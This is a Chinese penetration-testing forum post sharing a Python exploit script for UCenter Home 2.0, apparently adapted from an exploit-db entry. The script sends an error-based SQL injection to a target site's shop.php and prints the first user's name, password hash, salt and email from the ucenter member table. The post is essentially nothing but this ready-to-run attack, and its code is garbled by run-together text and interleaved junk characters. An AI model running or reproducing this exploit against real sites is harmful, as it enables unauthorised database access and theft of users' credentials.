找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2344|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
" V; \0 G% n6 ~+ I4 \+ w. y& N1 l
1 _+ o/ w+ C3 h% ]# g, ?% F
2 f5 X$ A' V. z& y$ i#!/usr/bin/env python  
/ u3 p" a0 C2 E* F
1 m  X8 G9 l3 `  e1 `/ y% J9 L: qimport sys  
2 y3 d: f% i+ q0 Z- P# Vimport urllib2  , w) Y  _& h: s
import re  
1 z0 r+ L+ h/ V, F
. T, {$ N* i! d+ Idef info():  
0 }" ~6 \" e' X' i. b; K, w* b/ G0 e    print 'From:http://www.exploit-db.com/exploits/14997/' , [& |% t$ u- m+ z
    print 'http://www.hake.cc/Web_loudong/' 7 I- q2 _" o7 s5 |& K& G& f" O
    print 'changed:qiaoy'  
+ w0 `, r3 `4 O+ K) u( s3 d' F8 Z9 a0 f    print 'exp:'  ! q. }9 B4 c* c& U7 ]+ S8 C* U) w
    print ' ./UCenter_Home_2.0.py site'  . d" X- r5 ?+ z, [2 B. ~, a
0 k% _& c6 B; O0 N
def main():  
, Q5 Q0 x/ _1 {    if len(sys.argv) != 2:  
- T6 J5 g4 Z3 {0 R! T        info()  
& u- T1 A) i/ V9 g    else:  & o  r, ]! v; _! K
        site = sys.argv[1]  ' s; ^5 S# c: @) d* o
        if site[0:7] == 'http://':  4 B" ?* S5 _- e
            sitesite =site  
8 J/ @/ T  ^5 G4 _6 D2 {. W$ t& ^        elif site[0:8] == 'https://':  # ]6 m+ n, l$ C) m, Q
            sitesite = site  7 L2 T+ P1 N0 X+ N6 r# L$ R
        else:  / Z, s+ O; B# t( [2 Q# U  m- x
            site = 'http://'+site  
0 C2 H. N2 T4 f  R3 ]        try:  ; x  [- |6 I& \& `3 V$ S+ @
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
, b' B) _8 G# R* V            Value = urllib2.urlopen(url).read()  
& M+ o/ D# N' r7 o- G& W) ~0 o            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
2 H8 G6 h! j6 \7 j/ B6 j' M            hacked = Msg.split(':')  ( f% }, P+ t2 D) S& y% j7 s
            print 'Name:    '+hacked[1]  
, `) o6 l+ B: q# w0 R0 y+ `* S; X& c            print 'Passwd:  '+hacked[2]  
' Q7 W4 b9 w$ ^" Y" V            print 'salt:    '+hacked[3]  1 z9 P+ O! j- v0 X( ~# N
            print 'email:   '+hacked[4]  ! f0 A5 R2 D; Z. Y' p- ]
        except:  
6 h/ |, D( o/ t, \$ m6 v( a            print 'Sorry,I can\'t work............'  
. F: I* x) ?% T0 ? + G7 |0 J# n, o. V5 [# F" H
if __name__ == '__main__':  - |4 u; K1 }# O( u- E5 X
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表